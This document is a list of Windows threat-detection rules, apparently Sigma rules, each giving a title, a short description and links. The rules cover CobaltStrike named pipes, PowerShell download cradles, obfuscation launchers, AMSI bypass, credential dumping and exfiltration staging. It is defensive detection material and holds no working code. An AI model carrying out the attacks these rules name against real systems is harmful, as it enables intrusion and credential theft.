Network Connection Initiated By Regsvr32.EXE Detects a network connection initiated by "Regsvr32.exe" https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/, https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
Potentially Suspicious Malware Callback Communication Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo
Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains. https://twitter.com/M_haggis/status/900741347035889665, https://twitter.com/M_haggis/status/1032799638213066752, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker, https://www.cisa.gov/uscert/ncas/alerts/aa22-321a, https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1
Microsoft Sync Center Suspicious Network Connections Detects suspicious connections from Microsoft Sync Center to non-private IPs. https://redcanary.com/blog/intelligence-insights-november-2021/
Rundll32 Internet Connection Detects a rundll32 that communicates with public IP addresses https://www.hybrid-analysis.com/sample/759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6?environmentId=100
Uncommon Outbound Kerberos Connection Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation. https://github.com/GhostPack/Rubeus
Potential Remote PowerShell Session Initiated Detects a process that initiated a network connection over ports 5985 or 5986 from a non-network service account. This could potentially indicates a remote PowerShell connection. https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html
Communication To Uncommon Destination Ports Detects programs that connect to uncommon destination ports https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo
Outbound Network Connection To Public IP Via Winlogon Detects a "winlogon.exe" process that initiate network communications with public IP addresses https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/
Suspicious Outbound SMTP Connections Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp, https://www.ietf.org/rfc/rfc2821.txt
CobaltStrike Named Pipe Detects the creation of a named pipe as used by CobaltStrike https://twitter.com/d4rksystem/status/1357010969264873472, https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/, https://github.com/SigmaHQ/sigma/issues/253, https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/, https://redcanary.com/threat-detection-report/threats/cobalt-strike/
Suspicious Network Connection Binary No CommandLine Detects suspicious network connections made by a well-known Windows binary run with no command line parameters https://redcanary.com/blog/raspberry-robin/
ADFS Database Named Pipe Connection By Uncommon Tool Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database). Used to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens. https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml, https://o365blog.com/post/adfs/, https://github.com/Azure/SimuLand
Suspicious Wordpad Outbound Connections Detects a network connection initiated by "wordpad.exe" over uncommon destination ports. This might indicate potential process injection activity from a beacon or similar mechanisms. https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit
CobaltStrike Named Pipe Pattern Regex Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575, https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752
Outbound Network Connection Initiated By Script Interpreter Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads. https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md
Potentially Suspicious Wuauclt Network Connection Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections. One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule. https://dtm.uk/wuauclt/
Local Network Connection Initiated By Script Interpreter Detects a script interpreter (Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder. https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md
CobaltStrike Named Pipe Patterns Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575, https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752
HackTool - CoercedPotato Named Pipe Creation Detects the pattern of a pipe name as used by the hack tool CoercedPotato https://blog.hackvens.fr/articles/CoercedPotato.html, https://github.com/hackvens/CoercedPotato
HackTool - EfsPotato Named Pipe Creation Detects the pattern of a pipe name as used by the hack tool EfsPotato https://twitter.com/SBousseaden/status/1429530155291193354?s=20, https://github.com/zcgonvh/EfsPotato
HackTool - DiagTrackEoP Default Named Pipe Detects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses "SeImpersonate" privilege. https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22
HackTool - Koh Default Named Pipe Detects creation of default named pipes used by the Koh tool https://github.com/GhostPack/Koh/blob/0283d9f3f91cf74732ad377821986cfcb088e20a/Clients/BOF/KohClient.c#L12
HackTool - Credential Dumping Tools Named Pipe Created Detects well-known credential dumping tools execution via specific named pipe creation https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://image.slidesharecdn.com/zeronights2017kheirkhabarov-171118103000/75/hunting-for-credentials-dumping-in-windows-environment-57-2048.jpg?cb=1666035799
Alternate PowerShell Hosts Pipe Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html, https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html
New PowerShell Instance Created Detects the execution of PowerShell via the creation of a named pipe starting with PSHost https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html, https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html
PUA - CSExec Default Named Pipe Detects default CSExec pipe creation https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view, https://github.com/malcomvetter/CSExec
PUA - PAExec Default Named Pipe Detects PAExec default named pipe https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Command%20and%20Control/C2-NamedPipe.md, https://github.com/poweradminllc/PAExec
PUA - RemCom Default Named Pipe Detects default RemCom pipe creation https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view, https://github.com/kavika13/RemCom
WMI Event Consumer Created Named Pipe Detects the WMI Event Consumer service scrcons.exe creating a named pipe https://github.com/RiccardoAncarani/LiquidSnake
Malicious Named Pipe Created Detects the creation of a named pipe seen used by known APTs or malware. https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/, https://securelist.com/faq-the-projectsauron-apt/75533/, https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, https://www.us-cert.gov/ncas/alerts/TA17-117A, https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html, https://thedfirreport.com/2020/06/21/snatch-ransomware/, https://github.com/RiccardoAncarani/LiquidSnake, https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity, https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a, https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf, https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/, https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
Nslookup PowerShell Download Cradle Detects a powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records. https://twitter.com/Alh4zr3d/status/1566489367232651264
PsExec Tool Execution From Suspicious Locations - PipeName Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack https://www.jpcert.or.jp/english/pub/sr/ir_research.html, https://jpcertcc.github.io/ToolAnalysisResultSheet
Delete Volume Shadow Copies Via WMI With PowerShell Shadow Copies deletion using operating systems utilities via PowerShell https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md, https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods
PowerShell Downgrade Attack - PowerShell Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0 http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
PowerShell Called from an Executable Version Mismatch Detects PowerShell called from an executable by the version mismatch method https://adsecurity.org/?p=2921
Netcat The Powershell Version Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network https://nmap.org/ncat/, https://github.com/besimorhino/powercat, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md
Potential RemoteFXvGPUDisablement.EXE Abuse Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1
Remote PowerShell Session (PS Classic) Detects remote PowerShell sessions https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html
Renamed Powershell Under Powershell Channel Detects a renamed Powershell execution, which is a common technique used to circumvent security controls and bypass detection logic that's dependent on process names and process paths. https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
Suspicious PowerShell Download Detects suspicious PowerShell download command https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html
Use Get-NetTCPConnection Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell
Zip A Folder With PowerShell For Staging In Temp - PowerShell Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a
Tamper Windows Defender - PSClassic Attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
Suspicious Non PowerShell WSMAN COM Provider Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application. https://twitter.com/chadtilbury/status/1275851297770610688, https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/, https://github.com/bohops/WSMan-WinRM
Potential Active Directory Enumeration Using AD Module - PsModule Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration. https://github.com/samratashok/ADModule, https://twitter.com/cyb3rops/status/1617108657166061568?s=20, https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges
Alternate PowerShell Hosts - PowerShell Module Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html
Bad Opsec Powershell Code Artifacts focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including Cobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads that often undergo minimal changes by attackers due to bad opsec. https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/, https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/, https://www.mdeditor.tw/pl/pgRt
Clear PowerShell History - PowerShell Module Detects keywords that could indicate clearing PowerShell history https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a
PowerShell Decompress Commands A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files. https://github.com/OTRF/detection-hackathon-apt29/issues/8, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.A.3_09F29912-8E93-461E-9E89-3F06F6763383.md
Malicious PowerShell Scripts - PoshModule Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance https://github.com/PowerShellMafia/PowerSploit, https://github.com/NetSPI/PowerUpSQL, https://github.com/CsEnox/EventViewer-UACBypass, https://web.archive.org/web/20210511204621/https://github.com/AlsidOfficial/WSUSpendu, https://github.com/nettitude/Invoke-PowerThIEf, https://github.com/S3cur3Th1sSh1t/WinPwn, https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries, https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1, https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1, https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1, https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1, https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/, https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/, https://github.com/HarmJ0y/DAMP, https://github.com/samratashok/nishang, https://github.com/DarkCoderSc/PowerRunAsSystem/, https://github.com/besimorhino/powercat
Suspicious Get-ADDBAccount Usage Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/, https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md
PowerShell Get Clipboard A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents. https://github.com/OTRF/detection-hackathon-apt29/issues/16, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.md
HackTool - Evil-WinRm Execution - PowerShell Module Detects the execution of Evil-WinRM via PowerShell Module logs by leveraging the hardcoded strings inside the utility. https://github.com/Hackplayers/evil-winrm/blob/7514b055d67ec19836e95c05bd63e7cc47c4c2aa/evil-winrm.rb, https://github.com/search?q=repo%3AHackplayers%2Fevil-winrm++shell.run%28&type=code
Invoke-Obfuscation CLIP+ Launcher - PowerShell Module Detects Obfuscated use of Clip.exe to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888
Invoke-Obfuscation STDIN+ Launcher - PowerShell Module Detects Obfuscated use of stdin to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation VAR+ Launcher - PowerShell Module Detects Obfuscated use of Environment Variables to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module Detects Obfuscated Powershell via COMPRESS OBFUSCATION https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module Detects Obfuscated Powershell via RUNDLL LAUNCHER https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Stdin - PowerShell Module Detects Obfuscated Powershell via Stdin in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use MSHTA - PowerShell Module Detects Obfuscated Powershell via use MSHTA in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use Clip - PowerShell Module Detects Obfuscated Powershell via use Clip.exe in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use Rundll32 - PowerShell Module Detects Obfuscated Powershell via use Rundll32 in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module Detects Obfuscated Powershell via VAR++ LAUNCHER https://github.com/SigmaHQ/sigma/issues/1009
Malicious PowerShell Commandlets - PoshModule Detects Commandlet names from well-known PowerShell exploitation frameworks https://adsecurity.org/?p=2921, https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries, https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1, https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1, https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1, https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1, https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/, https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/, https://github.com/calebstewart/CVE-2021-1675, https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1, https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html, https://github.com/HarmJ0y/DAMP, https://github.com/samratashok/nishang, https://github.com/DarkCoderSc/PowerRunAsSystem/, https://github.com/besimorhino/powercat, https://github.com/Kevin-Robertson/Powermad, https://github.com/adrecon/ADRecon, https://github.com/adrecon/AzureADRecon
Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1
AD Groups Or Users Enumeration Using PowerShell - PoshModule Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md
Remote PowerShell Session (PS Module) Detects remote PowerShell sessions https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html
Suspicious PowerShell Download - PoshModule Detects suspicious PowerShell download command https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfile?view=net-8.0, https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring?view=net-8.0
Use Get-NetTCPConnection - PowerShell Module Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell
Suspicious PowerShell Invocations - Generic - PowerShell Module Detects suspicious PowerShell invocation command parameters Internal Research
Suspicious PowerShell Invocations - Specific - PowerShell Module Detects suspicious PowerShell invocation command parameters Internal Research
Suspicious Get Local Groups Information Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md
Suspicious Computer Machine Password by PowerShell The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain. You can use it to reset the password of the local computer. https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1, https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
Suspicious Get Information for SMB Share - PowerShell Module Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md
Zip A Folder With PowerShell For Staging In Temp - PowerShell Module Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a
SyncAppvPublishingServer Bypass Powershell Restriction - PS Module Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/
AADInternals PowerShell Cmdlets Execution - PsScript Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365. https://o365blog.com/aadinternals/, https://github.com/Gerenios/AADInternals
Access to Browser Login Data Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md
Potential Active Directory Enumeration Using AD Module - PsScript Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration. https://github.com/samratashok/ADModule, https://twitter.com/cyb3rops/status/1617108657166061568?s=20, https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges
Add Windows Capability Via PowerShell Script Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others. https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell, https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content
Powershell Add Name Resolution Policy Table Rule Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace. This will bypass the default DNS server and uses a specified server for answering the query. https://twitter.com/NathanMcNulty/status/1569497348841287681, https://learn.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps
PowerShell ADRecon Execution Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7 https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1, https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319
AMSI Bypass Pattern Assembly GetType Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/, https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA
Potential AMSI Bypass Script Using NULL Bits Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi
Silence.EDA Detection Detects Silence EmpireDNSAgent as described in the Group-IP report https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf
Get-ADUser Enumeration Using UserAccountControl Flags Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting, https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/
Potential Data Exfiltration Via Audio File Detects potential exfiltration attempt via audio file using PowerShell https://github.com/gtworek/PSBits/blob/e97cbbb173b31cbc4d37244d3412de0a114dacfb/NoDLP/bin2wav.ps1
Automated Collection Command PowerShell Once established within a system or network, an adversary may use automated techniques for collecting internal data. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md
Windows Screen Capture with CopyFromScreen Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-6---windows-screen-capture-copyfromscreen
Clearing Windows Console History Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/, https://www.shellhacks.com/clear-history-powershell/, https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics
Clear PowerShell History - PowerShell Detects keywords that could indicate clearing PowerShell history https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a
Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html, https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/, https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf
Powershell Create Scheduled Task Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task
Powershell Install a DLL in System Directory Uses PowerShell to install/copy a file into a system directory such as "System32" or "SysWOW64" https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1556.002/T1556.002.md#atomic-test-1---install-and-register-password-filter-dll
Registry-Free Process Scope COR_PROFILER Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR. (Citation: Microsoft Profiling Mar 2017) (Citation: Microsoft COR_PROFILER Feb 2013) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler
PowerShell Create Local User Detects creation of a local user via PowerShell https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md
